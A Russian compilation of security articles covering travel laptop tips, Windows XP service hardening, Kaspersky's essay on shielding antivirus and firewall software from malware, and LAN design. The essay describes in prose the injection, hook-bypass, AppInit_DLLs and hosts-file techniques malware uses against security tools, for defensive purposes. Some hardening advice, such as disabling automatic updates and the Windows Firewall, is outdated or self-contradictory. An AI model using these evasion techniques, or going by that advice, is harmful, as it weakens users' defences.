Очевиднейшая мера, но на всякий случай я решил о ней упомянуть.
#6: Постоянно обновляйте операционную систему
Также позаботьтесь об обновлении версий антивируса, брандмауэра, веб-браузера и Wi-Fi клиента. Это предотвращает попытки атак, связанных с уязвимостью приложений.
#7: Защитите личную информацию, номера кредитных карт и банковских счетов
Возможность веб-браузеров сохранять личную информацию может также сыграть на руку злоумышленникам при потере или краже ноутбука. В течение многих лет для защиты личной информации я использую программу Password Manager XP. Она требует запомнить лишь один пароль, что весьма полезно не только путешественникам. На этом сайте также имеется множество других программ по хранению и шифрованию данных.
#8: Используйте технологии для безопасного и анонимного веб-сёрфинга
Это очень важно при отсутствии или неправильной настройке VPN-клиента. Существуют различные веб-сайты, предоставляющие технологии SSL VPN, которые обеспечивают зашифрованное соединение ноутбука с их сервером безопасности. Такой вид связи устраняет целый ряд проблем. Одни из самых улучшенных сервисов — Megaproxy и TOR. Я использую немного отличающийся механизм, основанный на технологии USB-флэш. IronKey — безопасный флэш-диск с предустановленными приложениями FireFox и TOR. При подключении к интернету устройство автоматически создает зашифрованный канал связи к серверам безопасности IronKey. Также рекомендую ознакомиться со статьёй Наиболее распространенне ошибки способствующие похищению личных данных
#9: При необходимости используйте технологию VPN
Главный недостаток предыдущего метода в том, что он работает лишь с веб-приложениями. Если же дело касается почтовых клиентов, например Outlook, в игру вступает полноценное VPN-соединение. Большинство путешествующих бизнесменов пользуются только им. Канал VPN позволяет пользователю удаленно подключаться к домашней или корпоративной сети. В этом случае все обычные офисные приложения, доступ к файлам и интернету контролируются сетью компании. На рынке представлено множество аппаратных и программных VPN-решений. Я выбрал OpenVPN.
#10: Используйте приложения для обеспечения удалённого доступа
Отличный способ избежать многих проблем — не пересылать личную информацию по сомнительной сети на свой ноутбук. Для этого следует воспользоваться сервисом LogMeIn, предоставляющий удалённый доступ к домашнему или рабочему ПК по зашифрованному каналу связи. Веб-сёрфинг, а также работа с почтовым клиентом и другими приложениями осуществляется на удалённой машине. Никакая важная информация при этом не попадает в ноутбук, если только этого не желает сам пользователь.
Путешественники должны проявлять смекалку. Помимо исполнения своих прямых рабочих обязанностей им приходится почти постоянно пребывать в сети, пока они вдали от дома или офиса. Эти простые советы помогут лучше защитить компьютеры и важную информацию, куда бы они ни отправились. Для более получения более полной информации, рекомендую ознакомиться с другими статьями о безопасности вашего ПК.
Безопасность в твоих руках. Конфигурирование MS Windows XP
Автор: Евгений Кучук
Сегодня мы поговорим о способах защиты компьютера путем конфигурирования ОС Windows XP. Необходимость этого, прежде всего, связана с атакой и взломом самих настроек операционной системы, а также использованием ее ошибок. Заранее предупреждаю, что при управлении службами вы должны быть внимательными и запоминать, какие службы отключаются.
Итак, начнем с простого. Одним из способов распространения угроз является переполнение буфера. Напомню, что это запись данных в выделенную область памяти, которая превышает предельный для нее заявленный объем. В результате чего данные, не вмещающиеся в буфер, записываются в соседние области памяти и могут повредить их содержимое. Новые, 64-разярядные процессоры от AMD и Intel имеют аппаратные средства защиты от переполнения буфера, а в ОС Windows это организовано одноименным модулем защиты DEP (Data Execution Prevention). Этот модуль вы найдете тут: Пуск — Настройка — Панель управления — Система, далее во вкладке Дополнительно ищем Параметры быстродействия и выбираем вкладку Предотвращение перевыполнения данных.
Самый надежный способ защиты — это отказ от возможности обмена файлами по локальным сетям и через Интернет. Для этого, предварительно отключив сетевое подключение, нам необходимо пройти к его свойствам: Пуск — Настройка — Сетевые подключения, выбрать ваше подключение и открыть свойства. Удалить в свойствах подключения все, что бы остался только Протокол TCP/IP. Далее ищем в свойствах протокола TCP/IP раздел WINS, в котором нам необходимо отключить NetBIOS и снять галочку, где стоит Включить просмотр LMHosts.
Для предотвращения заражения посредством автоматического запуска содержимого съемных носителей необходимо отключить автозапуск для всех типов дисков. Чтобы не рыться в ключах реестра, посоветую хорошую программу, которая сама все за вас сделает — Panda Research USB Vaccine.
А теперь перейдем к основным источникам внедрения угроз — службам операционной системы. Основной задачей при отключении служб является закрытие сетевых портов, это предотвращает эксплуатацию уязвимостей системных сервисов и других установленных программ посредством сетевых атак. Как только служба прекращает работу, используемый ею сетевой порт перестает быть открытым. Другие службы рекомендуется отключать потому, что сами функции, которые они предлагают, могут быть использованы в злонамеренных целях. И, несомненно, плюсом от отключения служб является высвобождение ресурсов оперативной памяти.
Для закрытия наиболее атакуемых сетевых портов Windows рекомендуется использовать специальную программу — Windows Worms Doors Cleaner. Достоинством этой программы является то, что она не полностью отключает службы, а закрывает их используемые порты через правку реестра. Эти действия защищают ОС от нежелательных ошибок в реестре при правке вручную.
Остальное, к сожалению, придется делать вручную через администрирование служб. Пройти к менеджеру служб можно через Пуск — Настройка — Панель управления — Администрирование — Службы.
В списке служб понадобится выбрать службу, два раза кликнуть по ней и в открывшемся окне свойств выбрать Выключено. Если по необходимости некоторые службы вами будут использоваться — выставлять Авто. Обратите внимание на пояснение, так как вы должны сами понимать, используется эта служба операционной системой или нет, службы без описания можно просто отключить (при этом имейте в виду, что установка, скажем, антивирусной системы или же сетевого экрана, как правило, ведет к созданию соответствующей службы. Например, Agnitum Client Security Service у продуктов Agnitum Ltd. — Евгений Кучук).
NVIDIA Display Driver Service;
ASP.NET State Service;
DHCP-клиент (позволяет компьютеру получать динамический IP-адрес, а также выполнять обновление DNS, следовательно, выключаем, если у вас нет подключения к Интернету через модем);
DNS-клиент (выполняет запросы на соотнесение доменных имен и IP-адресов, после чего сохраняет их в кэше и позволяет не обращаться к DNS-серверу повторно);
Machine Debug Manager;
NetMeeting Remote Desktop Sharin (служба разрешает получать доступ к удаленному рабочему столу с использованием ресурса NetMeeting); NET Runtime Optimization Service,
Office Source Engine;
Windows Media Player Network Sharing Service;
Автоматическое обновление;
Брандмауэр Windows/Общий доступ к Интернету (ICS);
Веб-клиент (данный ресурс предназначен для обеспечения доступа к файлам, размещенным в Интернете. С помощью данной службы приложения Windows способны создавать, получать доступ и изменять файлы в сети Интернет);
Вторичный вход в систему (отключаем, если вы единственный пользователь на компьютере);
Диспетчер сетевого DDE (этот сервис организует динамический обмен данными между компьютерами в локальной сети, но никак не затрагивает Интернет);
Доступ к HID-устройствам (служба предназначена для поддержки клавиш быстрого доступа на различных устройствах ввода или управления); Координатор распределенных транзакций;
Маршрутизация и удаленный доступ;
Модуль поддержки NetBIOS через TCP/IP (отключаем через Windows Worms Doors Cleaner);
Планировщик заданий;
Сервер папки обмена;
Служба COM записи компакт-дисков IMAPI (отключать, если не пользуетесь встроенными возможностями Windows для записи);
Служба Windows Media Connect;
Служба восстановления системы (специализированные программы намного лучше);
Служба времени Windows (Синхронизирует время через Интернет);
Служба загрузки изображений (WIA);
Служба индексирования (предварительно нужно на всех дисках снять галочку, где установлено «Разрешить индексирование для быстрого поиска». От отключения службы поиск не замедляется);
Служба обнаружения SS (Назначение этой службы — обнаружение сетевых устройств Universal Plug and Play в локальной сети, таких как принтеры или МФУ);
Служба регистрации ошибок;
Служба сетевого DDE;
Служба шлюза уровня приложения (Application Layer Service) (можно отключить только на SP2),
Служба IPSEC (служба IPSEC обеспечивает безопасность протокола IP посредством проверки узлов на сетевом уровне, проверок подлинности, а также управляет политикой IP-безопасности);
Служба терминалов;
Совместимость быстрого переключения пользователей (отключаем, если вы единственный пользователь на компьютере);
Справка и поддержка (рекомендую выставить «вручную»);
Узел универсальных PnP-устройств;
Фоновая интеллектуальная служба передачи (BITS);
Центр обеспечения безопасности;
Remote Registry — Удаленный реестр (если стоит ОС Win XP Professional, требуется обязательно отключить, по причине того, что служба позволяет полностью управлять компьютером по сети).
Все изменения заработают после перезагрузки системы.
Вот такими способами можно обезопасить свой компьютер от вирусов и сетевых атак. И конечно, не следует забывать об антивирусе и фаерволле, управлении cookies, а также контролировать автозапуск программ в Windows.
Бронежилет для файрвола
Автор: Крис Касперски
Очень часто антивирусы и брандмауэры превращаются из охотников в жертвы. В борьбе с активной малварью еще и не такое случается. И хотя разработчики всячески пытаются защититься от посягательств со стороны зловредного кода, воздвигая целый комплекс средств противовоздушной обороны, при схватке с грамотно спроектированным зловредным кодом они обречены на поражение. Как усилить защиту уже существующих антивирусов/брандмауэров, не вмешиваясь в их машинный код и не ковыряя исходные тексты, которых у нас все равно нет? Реально ли это вообще? Еще бы!
Мужская часть населения еще помнит те давние время, когда антивирус (вместе со всеми базами и самой MS-DOS) умещался на одной «стерильной» дискетке с защитой от записи откуда его настоятельно рекомендовалось запускать. Запуск антивируса из-под зараженной операционной системы часто приводил к ложным негативным срабатываниям. То есть антивирус не находил даже известные ему вирусы, а все потому, что зловредный код слишком хорошо знал антивирус и модифицировал его код, отвечающий за распознавание заразы.
Современные антивирусы на дискету уже не влезают и вынуждены сражаться с активной малварью, в арсенале которой помимо многочисленных маскировочных методов имеется и оружие возмездия. Аналогичным образом дела обстоят и с персональными брандмауэрами. Их тяжело пробить снаружи (то есть с удаленной машины), но легко отключить локально, внедрившись в адресное пространство брандмауэра или поигравшись с элементами управления путем эмуляции клавиатурного/мышиного ввода (атаки типа WM_).
Конечно, разработчики всячески защищаются от нападок со стороны вредоносного кода (например, путем проверки целостности собственного тела). Однако получается у них не очень хорошо, и вообще создается впечатление, что они в первую очередь озабочены качеством детекции и количеством распознаваемых вирусов, то есть предпочитают нападать, а не обороняться. Вот только, вырвавшись вперед, они рискуют оказаться в плотном кольце окружения. «Независимые» обзоры также не уделяют защите никакого внимания, тестируя антивирусы/брандмауэры в лабораторных условиях.
Проактивные технологии, проверяющие все открываемые файлы на лету, действительно имеют хорошие шансы остановить распространение заразы, поскольку малварь уничтожается еще до того, как получит управление. А вот автономные сканеры, запускаемые раз в несколько дней (а то и недель), намного более уязвимы и, как показывает практика, очень плохо справляются с поиском руткитов. А если вспомнить, что зловредный код часто распространяется через дыры в безопасности (антивирусами не контролируемые), их судьба становится совсем незавидной.
Статья построена на основе анализа большого количества малвари. Мыщъх исследовал наиболее популярные техники противодействия антивирусам/брандмауэрам и разработал простые и эффективные «бронежилеты», пригодные для защиты уже существующих программ без какой бы то ни было их переделки. Поэтому не волнуйся: дизассемблер тебе не понадобится!
Стратегические ракеты межпроцессорного назначения
Как работает малварь? Какие приемы используются для ослепления защитных механизмов? Возможных способов очень много, и каждый день появляются все новые и новые. Чтобы навести в этом хаосе хотя бы какое-то подобие порядка, необходимо классифицировать основные методы, а также их производные. Тогда станет понятно, от кого и как нам обороняться.
Порядка 80 % зловредных программ открывают процесс-жертву API-функцией OpenProcess, получая (в случае успешного завершения операции) дескриптор процесса, передаваемый API-функции ReadProcessMemory. Последняя читает содержимое памяти процесса-жертвы и копирует его во внутренний буфер малвари, которая путем сигнатурного поиска пытается отловить все известные ей защитные программы (список активных процессов можно получить средствами TOOLHELP32). Если подобная программа обнаруживается, малварь смотрит в свою базу сигнатур, извлекая смещение машинных команд, которые надлежит нейтрализовать, что осуществляется путем перезаписи памяти жертвы API-функцией WriteProcessMemory. В большинстве случаев достаточно заменить пару условных переходов, навсегда отучив антивирус/брандмауэр ругаться грязными словами.
В более сложных случаях малварь впрыскивает внутрь защитной программы свой код, ведущий партизанскую войну с защитным механизмом с учетом конкретных ситуаций, что намного более предпочтительно, поскольку новые версии антивирусов/брандмауэров выходят достаточно часто и создателю малвари приходится постоянно обновлять базу сигнатур. С закрытых позиций (то есть из соседнего процесса) нанести прицельный удар не так-то просто! Ошибка в один единственный байт может привести к зависанию, что не есть хорошо. Напротив, оказавшись внутри антивируса/брандмауэра, хакерский код без проблем обезвредит все «детонаторы» вполне универсальным путем: например, установит еще один перехватчик открываемых файлов поверх установленного антивирусом, а перед передачей управления последнему сотрет в проверяемом файле все следы своего присутствия (естественно, сотрет только в памяти).
Внедрение в посторонние процессы осуществляется различными путями. Классический способ (работающий только в NT-подобных системах) — создать удаленный поток вызовом API-функции CreateRemoteThread или NativeAPI-функции NtCreateThread, однако перед этим необходимо забросить зловредный код внутрь атакуемого процесса. И тут хакеру на помощь приходят API-функции: AllocateVirtualMemory (для выделения блока памяти) или QueryVirtualMemory (для поиска уже выделенного блока, пригодного для внедрения) с последующим вызовом WriteProcessMemory.
Внедрение в стиле модерн апеллирует к манипуляциям с процессорным контекстом. Новые потоки при этом не создаются. Внутрь процесса-жертвы записывается зловредный код (и тут без WriteProcessMemory никак не обойтись!), а затем API-функциями GetThreadContext/SetThreadContext регистр-указатель команд перемещается на начало зловредного кода, длина которого обычно составляет несколько десятков байт — вполне достаточно, чтобы загрузить свою динамическую библиотеку или «открыть портал». Но это уже детали реализации.
Некоторые (между прочим, достаточно многие) антивирусы/брандмауэры перехватывают вызовы WriteProcessMemory/SetThreadContext и поднимают тревогу, если запись происходит в секцию кода. Однако этот перехват достаточно легко обойти: например, вызывать API-функции не с первого байта, эмулируя выполнение пропущенных команд; или же внедряться в область данных. Правда, при активном аппаратном DEP попытка внедрения в область данных ведет к исключению, завершающему работу атакуемого приложения в аварийном режиме.
Обойти контроль за SetThreadContext можно путем подключения псевдоотладчика (созданного малварью) к процессу-жертве API-функцией DebugActiveProcess, за которой не следит ни один известный мне защитный механизм; и хакер может преспокойно получать контекст потока в свое распоряжение через генерацию отладочных событий. Такой способ внедрения в антивирусы/брандмауэры встречается все чаще и чаще.
Примерно 10 % зловредных программ лезут в следующую ветку системного реестра HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs, добавляя туда свою динамическую библиотеку, которую операционная система будет проецировать на адресное пространство всех GUI-приложений, передавая ей бразды правления до их запуска. Практически все современные защитные комплексы следят за AppInit_DLLs и начинают жутко материться, если там обнаруживается новая DLL. Однако, если малварь хакнула AppInit_DLLs до запуска антивируса/брандмауэра, им остается только утереться, поскольку кто первый получает управление, тот царь и король.
Еще приблизительно 10 % зловредных программ борются с защитами через оконный интерфейс. Что может быть проще! Находим окно по его заголовку (API-функции FindWindow или EnumWindows), добираемся до элементов интерфейсного управления и начинаем хачить их по своему усмотрению. Зловредный код может подавить появление нежелательных окон (например, сделав их невидимыми — API-функция ShowWindow), найти кнопку с надписью «Yes» и «надавить» на нее путем посылки соответствующих Windows-сообщений. Или же заблокировать все кнопки (API-функция WindowDisable). Наконец, можно забраться в настройки и отключить защиту, а чтобы пользователь ничего не заметил, каждый раз подсовывать ему поддельный экран. И это не фантастика! Такие вирусы уже есть, причем совсем не один, а написать их может даже школьник, едва осиливший Delphi и пролиставший по диагонали SDK.
Другой излюбленный объект атаки — файл \WINNT\System32\Drivers\etc\hosts, позволяющий сопоставлять IP-адреса с доменными именами и имеющий приоритет над DNS-сервером. То есть если малварь не хочет, чтобы антивирус обновлялся, то она просто добавляет в hosts-файл одну строчку, перенаправляя запросы к серверу обновлений куда-нибудь еще, например на локальный узел жертвы (которому соответствует адрес 127.0.0.1) или, что еще хуже, на сервер самого создателя малвари, распространяющий вредоносные обновления, которые содержат не только сигнатуры, но и машинный код. И хотя антивирусные базы в большинстве своем защищены цифровыми подписями и другими криптографическими средствами, при большом желании со стороны хакера их можно обойти.
Впрочем, пора уже разобрать несколько эффективных приемов обороны от всего этого безобразия.
Способ 1. Используем «бронежилет»
Малварь нужно бить еще на взлете. Самое простое, что можно только сделать, — это упаковать антивирус/брандмауэр достойным протектором, препятствующим сигнатурному поиску и внедрению в охраняемый процесс постороннего кода. Крутых протекторов сейчас как никогда много, взять хотя бы туже Themid‘у (которая в просторечии завется Фемидой). Правда, на официальном сайте (www.oreans.com) лежит только демонстрационная версия…
Чем хороша Фемида? А тем, что перехватывает и блокирует следующие API-функции: NtAllocateVirtualMemory, NtCreateThread, NtQueryVirtualMemory, NtReadVirtualMemory, ZwTerminateProcess, NtWriteVirtualMemory. Префикс Nt означает, что мы имеем дело с NativeAPI-функциями, самыми низкоуровневыми системными функциями, доступными на прикладном уровне, что одним махом срубает до примерно 80 % всей малвари. Конечно, если малварь работает на уровне ядра, то это другое дело, но и в этом случае ей придется изрядно напрячься, поскольку тело упакованного файла зашифровано и расшифровывается динамически по ходу его исполнения, тут же зашифровываясь вновь.
Без функции NtReadVirtualMemory малварь обломается с чтением содержимого защищенного процесса, а значит, не сможет отличить антивирус/брандмауэр от остальных программ. Запрет на создание удаленных потоков NariveAPI-функцией NtCreateThread не позволит внедриться в адресное пространство жертвы, тем более что NtWriteVirtualMemory все равно не работает. Ну и как бедная малварь должна копировать зловредный код?
Аналогичным образом обстоят дела и с другими атаками. Обработанный Фемидой файл практически неуязвим. Зачастую настолько неуязвим, что вообще неработоспособен. Фемида не самый корректный упаковщик, и простейший контроль целостности, выполняемый антивирусом/брандмауэром, тут же показывает, что с файлом что-то не то. Как следствие, антивирус/брандмауэр выдает на экран предупреждающее сообщение или вообще отказывается работать. В такой ситуации нам остается либо взять в лапы hiew и вырезать из антивируса/брандмауэра систему самоконтроля, которая нам только мешает, либо же, поигравшись с настройками протектора, выбрать компромиссный вариант, который и от малвари защищает и ругательств со стороны защиты не вызывает.
Способ 2. Зовем на помощь отладчик
Если примирить защиту с протектором никак не получается, имеет смысл обратиться за помощью к отладчику, например к бесплатно распространяемому OllyDdb. Просто загружаем защищаемую программу в Ольку (или прицепляется к уже запущенному процессу: «File — > Attach») и нажимаем (Run) для нормального продолжения выполнения программы без трассировки.
Что это дает? Во-первых, поскольку отладка в Windows нереентерабельна, то процесс, находящийся под покровительством Ольки, не может отлаживать никто другой, и попытки малвари зацепиться за него ни к чему не приведут. Так же Олька позволяет отслеживать появление новых потоков (как локальных, так и удаленных). Достаточно в меню «Options — > Debugging Options» взвести галочку «Break on new thread» во вкладке Event. Тогда отладчик будет останавливаться всякий раз при создании нового потока. И хотя антивирусы/брандмауэры активно создают свои собственные потоки в целях производственной необходимости (что очень надоедает), все-таки такая защита лучше, чем совсем никакой.
А если еще взвести и галочку «Break on new module» (DLL), то отладчик будет останавливаться при загрузке всякой динамической библиотеки. И хотя опять-таки антивирусы/брандмауэры могут подгружать библиотеки по ходу дела, обычно это происходит в строго определенных ситуациях при совершении пользователем тем или иных действий. Беспричинная загрузка DLL с вероятностью, близкой к единице, свидетельствует об атаке!
Способ 3. Используем биты NX/XD
Наконец, высший пилотаж — защита кодовых секций от внедрения. Работает только на процессорах с поддержкой битов NX/XD (то есть достаточно современных процессорах) и с XP SP2 с задействованным аппаратным DEP для всех приложений (по умолчанию DEP распространяется только на системные компоненты).
В отладчике нажимаем , чтобы увидеть карту адресного пространства. Находим там модуль, имя которого совпадает с именем антивирусного процесса; видим секцию. text (реже CODE), щелкаем правой клавишей мыши, в контекстом меню выбираем пункт «Set Access — > Execute» — и все! С этого момента любая попытка чтения секции кода приведет к исключению, отлавливаемому отладчиком и блокирующему атаку. Напоминаю, что этот трюк действует только при соответствующей поддержке со стороны операционной системы и процессора (за подробностями отсылаю к своей статье, где все это описано). Правда, если антивирус/брандмауэр попытается подсчитать контрольную сумму кодовой секции для проверки собственной целостности, то его встретит жестокий облом. Впрочем, мы можем нажать для продолжения выполнения кода или на время снять запрет на чтение кодовой секции, только это все равно не спасет от малвари, модифицирующей стек или секцию данных. Но, к счастью, умной малвари в живой природе практически не встречается, и все больше приходится бороться со студенческими поделками.
Другая возможная проблема — антивирус/брандмауэр может не захотеть запускаться из-под отладчика, например, потому что доверху нашпигован различными антиотладочными приемами. Ну и что нам делать?!
Способ 4. Настраиваем права доступа
Хорошая идея — запустить антивирус/брандмауэр от имени администратора, а самим работать в пользовательской сессии. Тогда малварь, обладающая пользовательскими правами, просто не сможет открыть процесс защищенного приложения. Запуск программ от имени другого пользователя (в данном случае администратора) осуществляется штатной командой runas с ключами /profile и /env, копирующими профиль и среду текущего пользователя. Без этих ключей антивирус/брандмауэр, не найдя своих настроек, может просто не запуститься!
Запуск приложений от имени администратора — достаточно надежное средство защиты от посягательств на адресное пространство защищаемого процесса со стороны малвари, но! Эмуляция клавиатурного/мышиного ввода продолжает работать, что не есть хорошо. Как этому противостоять?! Увы, ответ обескураживающий. Даже со всеми нововведениями Windows Vista — никак. Единственная зацепка — заголовок окна. Большинство зловредных программ именно так и «палит» антивирусы/брандмауэры. Ну, изменить заголовок не проблема. Это умеет делать любой продвинутый твикер, например старый-добрый Customiser. Он же умеет двигать элементы управления (например, кнопки), изменяя их размеры. Зачем это нужно?! А затем, что более продвинутая малварь не смотрит на заголовок главного окна, а сечет раскладку дочерних элементов управления, поскольку положение и размеры элементов управления уникальны для каждого приложения, и их (в целях маскировки) рекомендуется слегка изменять. Customizer (как и большинство других твикеров подобного типа) позволяет сохранять профили изменений, автоматически восстанавливая их при каждом запуске и освобождая нас от необходимости делать эту рутинную работу вновь и вновь.
Способ 5. Защищаем hosts-файл
Следи также за файлом \WINNT\System32\Drivers\etc\hosts, удаляя посторонние записи. В принципе ничего не мешает грохнуть и сам файл hosts, поскольку очень мало пользователей использует его по назначению.
Следуя обозначенным рецептам защиты, мы намного увеличим безопасность своего компьютера, нанося малвари сокрушающий ответный удар. Но в мире нет и не может быть защиты, которую нельзя обойти. Поместив антивирус/брандмауэр в «бронежилет», мы всего лишь уменьшаем вероятность прямых попаданий, отсекая большое количество «шрапнели», пущенной пионерами. Приемы, предлагаемые нами, не претендуют ни на универсальность, ни на полноту. Однако они не требуют никакой квалификации и доступны каждому пользователю. А многолетний опыт автора показывает, что защищаться от малвари можно и нужно.
Используй описанные методы на свой страх и риск. Учти, что в случае неумелого использования и в некоторых других конкретных случаях можно не увеличить защиту, а скорее навредить.
Взлом и защита локальной сети
Автор: Олег Бойцев
В рамках данной статьи мы поговорим о безопасности локальной сети. Особое внимание будет уделено вопросам защиты технического уровня и практическим рекомендациям по обеспечению безопасной LAN. Учитывая всеобьемлемость темы, я постараюсь заострить внимание читателя на следующих вопросах: какие уязвимости используются чаще всего и какие политики безопасности им можно противопоставить.
Безопасная архитектура — это фундамент
Итак, помимо централизованной политики безопасности, без которой de facto невозможно построение безопасной сети в принципе, особое внимание следует обратить на следующее:
1) Использование безопасных протоколов обмена (не секрет, что такие текстовые протоколы, как FTP и Telnet, представляют собой явную угрозу) и туннелирование данных, например, посредством SSH.
2) Шифрование критичных данных с использованием надежных криптоалгоритмов.
3) Использование архитектуры, включающей в себя наличие DMZ (демилитаризованной зоны), обслуживаемой двумя файрволлами.
4) Использование IDS (Intrusion-Detection System), IPS (Intrusion-Prevention System) и NAT.
5) Защита периферии посредством тонких клиентов и двухфакторной системы аутентификации.
DMZ. Проектирование демилитаризованной зоны
Не секрет, что системы, открытые для прямого доступа извне, являются главными целями злоумышленников. Для организаций, имеющих дело с критичной и конфиденциальной информацией, вопрос защиты периметра сети стоит особенно остро. Политика безопасности внешних систем (web-сервер, почтовый сервер и др.) требуют самой тщательной проработки, так как они подвержены нападению в первую очередь. Задача заключается в том, чтобы ограничить доступ этих систем к действительно важным и секретным компьютерам, расположенным внутри сети, что реализуется посредством технологий, описанных мною ниже.
DMZ — сокращение от demilitarized zone (демилитаризованная зона) — подразумевает собой фрагмент сети, не являющийся полностью доверенным. Смысл создания DMZ заключается в том, чтобы оградить внутреннюю систему (в данном случае это наша защищенная LAN) от доступа, который осуществляется из Интернета. DMZ создается посредством реализации полузащищенной сетевой зоны, что достигается путем применения межсетевых экранов или маршрутизаторов со строгими фильтрами. Затем посредством элементов управления сетью определяется политика, какому трафику разрешается проникновение в DMZ, а какому трафику разрешено выходить за пределы DMZ. Очевидно, что все системы, доступные из внешней среды, должны быть размещены в демилитаризованной зоне. Следует учитывать и то, что, если система доступна через интерактивный сеанс (такой, как telnet или SSH), то открывается возможность проведения атак против других систем, находящихся в DMZ. В качестве модели рассмотрим следующую. Одна из возможных архитектур безопасной LAN c использованием демилитаризованной зоны изображена на рис. 1:
В данном случае наша сеть включает в себя два межсетевых экрана, отделяющих DMZ от внешней и внутренней сети. Внешняя сеть оказывается между маршрутизатором провайдера и первым межсетевым экраном, в то время как демилитаризованная зона размещается между межсетевыми экранами № 1 и № 2. В настройках межсетевого экрана № 1 предусмотрено разрешение прохождения всего трафика DMZ, а также всего внутреннего трафика (за некоторым исключением). Межсетевой экран № 2 сконфигурирован более жестко с учетом того, что разрешен только исходящий интернет-трафик. Подобная конфигурация значительно повышает общий уровень безопасности LAN. Нельзя не согласиться с тем, что использование и обслуживание пары межсетевых экранов повышает стоимость архитектуры и требует дополнительных усилий по управлению и настройке, но… оно того стоит.
IDS — система обнаружения вторжений. В идеальном случае такая система лишь выдаст сигнал тревоги при попытке проникновения. Обнаружение вторжений помогает при превентивной идентификации активных угроз посредством оповещений и предупреждений о том, что злоумышленник осуществляет сбор информации, необходимой для проведения атаки. Разновидностью IDS является IPS, возможности которой выходят за рамки простого обнаружения вторжений и дополняются возможностью превентивного противодействия. В настоящее время можно выделить, по крайней мере, два основных типа IDS:
Как правило, система HIDS размещается в узлах системы, отслеживая любую подозрительную активность, которую можно классифицировать как признаки атак на данный узел. HIDS представляют собой систему датчиков, загружаемых на различные серверы организации и управляемых центральным диспетчером. Сенсор HIDS позволяет определить, была ли атака успешной, если атака имела место на той же платформе, на которой установлен датчик. Следует заметить, что система HIDS, как правило, стоит дороже, чем сетевая система, что объясняется тем, что каждый сервер должен иметь лицензию на датчик (датчики дешевле для одного сервера, однако общая стоимость датчиков больше по сравнению со стоимостью использования сетевых IDS). При использовании системы HIDS следует обратить внимание на то, что работа процесса датчика на сервере может занимать до 15 % общего процессорного времени. При активно используемой системе подобная трата системных ресурсов может отрицательно сказаться на производительности, и, таким образом, не исключено, что вам придется приобретать более производительную систему. NIDS представляет собой программный комплекс, работающий на специально выделенной системе. Принцип функционирования NIDS чем-то схож с работой сетевого сниффера: NIDS переводит работу сетевой карты в системе в promiscuous mode (беспорядочный режим — состояние, в котором сетевой адаптер обнаруживает в сети все фреймы вне зависимости от их конечного адреса). После получения пакетов происходит анализ трафика с использованием набора правил и признаков атак для определения того, представляет ли этот трафик какой-либо интерес. На рис. 2 показана возможность использования двух типов IDS:
Еще одним инструментом, который мы применим при проектировании безопасной LAN, станет NAT.
NAT — это технология трансляции одного или нескольких адресов в другие адреса. В большинстве случаев функции NAT реализуются посредством межсетевого экрана (хорошим примером является Kerio Win Rout Firewall с гибкой системой настройки NAT). Маршрутизаторы также могут выполнять эту функцию. Очевидно, что функция безопасности NAT реализуется благодаря тому, что скрытые адреса внутренних систем являются невидимыми из внешней сети — в частности, из сети Интернет. Следует учитывать и тот факт, что для защиты от инсайдерских атак NAT бесполезна: если злоумышленник находится внутри организации или имеет прямой доступ к внутренней сети через VPN или телефонное соединение, то NAT и вовсе никак не сможет защитить сеть.
Необходимый минимум
1. При построении безопасной LAN следует минимизировать количество служб и сервисов, предоставляемых сетью, используемых клиентами из сети Интернет.
2. Архитектура LAN в обязательном порядке должна предусматривать наличие DMZ — демилитаризованной зоны, контролируемой межсетевым экраном.
3. Крайне желательно наличие NAT (система переадресации выполняет функцию сокрытия адресов внутренних систем).
4. Установка самых последних обновлений строго обязательна.
Даже если ваша система имеет самые последние обновления, расслабляться все равно не стоит: с момента обнаружения новой уязвимости и до момента выхода заплатки «умные люди» успевают написать эксплоит или создать червя.
5. Разумеется, как на сервере, так и на рабочих станциях должно быть установлено антивирусное ПО со свежими базами.
6. Если у вас до сих пор файловая система FAT32, смените ее на NTFS. NTFS de facto более безопасна: она позволяет разграничить доступ к ресурсам вашего ПК и значительно усложнит процесс локального и сетевого взлома паролей базы SAM.
7. В свойствах подключения крайне желательно оставить только самое необходимое, а именно ТСР/IP. «Службу доступа к файлам и принтерам сети Microsoft» необходимо отключить (касается машин, не предоставляющих SMS-доступ), чтобы не облегчать задачу всем любителям «дефолтовых» C$, D$, ADMIN$ и т. д.
8. Все неиспользуемые сервисы желательно выключить. Это не только улучшит производительность вашей системы, но и автоматически закроет кучу открытых портов (рис. 3):
9. Удалите лишние учетные записи (такие, как HelpAssistant и SUPPORT_388945a0), а в оснастке gpedit.msc запретите локальный и сетевой вход для всех пользователей, оставив только используемых на данной машине.
10. Пользователя «Администратор» лучше переименовать (через оснастку gpedit.msc).
11. Открытые по умолчанию ресурсы C$, D$, ADMIN$ желательно отключить (созданием параметра DWORD по адресу
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters):
12. В локальной сети не стоит забывать и о снифферах, с помощью которых ваши пароли могут стать «общественным достоянием» (не секрет, что пароли таких сервисов, как FTP и Telnet, передаются по LAN в открытом виде). Используя сниффер (например, Cain&Abel), даже зашифрованные пароли легко взломать.
Выход — построение локальной сети не на хабах (сетевые пакеты, которые получает хаб, распределяются по всем адресам независимо от места назначения), а на свитчах (используется технология доставки пакетов «по адресу»). Применение свитчей значительно усложняет процесс перехвата сетевых паролей и делает злоумышленника «видимым» (перехват паролей возможен даже при использовании свитчей(!), но в этом случае машина злоумышленника вынуждена генерировать ARP-пакеты — технология ARP-poizoning), используя стандартный набор для антисниффинга.
13. Минимальная сеансовая безопасность должна подразумевать использование криптостойкого алгоритма — NTLMv2:
Использование NTLMv2-механизма вместо уязвимого LM или NT значительно повышает криптостойкость паролей (включается через оснастку «Локальные параметры безопасности») и снижает возможные риски, связанные с перехватом и расшифровкой хэшей. Перечисленные способы защиты/построения безопасной сети — отнюдь не панацея против всех, кто всерьез решил взломать вашу сеть. Соблюдение вышеперечисленного минимума значительно снижает вероятность взлома, делая вашу сеть более безопасной к внешним и внутренним угрозам.
100 % защиты нет, к ней можно лишь приблизиться…
Безопасность — вопросы и ответы
Автор: Евгений Кучук
Думаю, что у каждого при чтении специализированной литературы возникали вопросы по поводу тех или иных терминов. Но, как правило, поблизости обычно нет того, кто может объяснить их значение. Проблемы возникают из-за непонимания простых вещей. Ведь неправильная трактовка или неправильное понимание может косвенным образом повлиять на многие важные вещи. Поэтому я предлагаю попробовать разобраться в некоторых мелочах мира информационной безопасности.
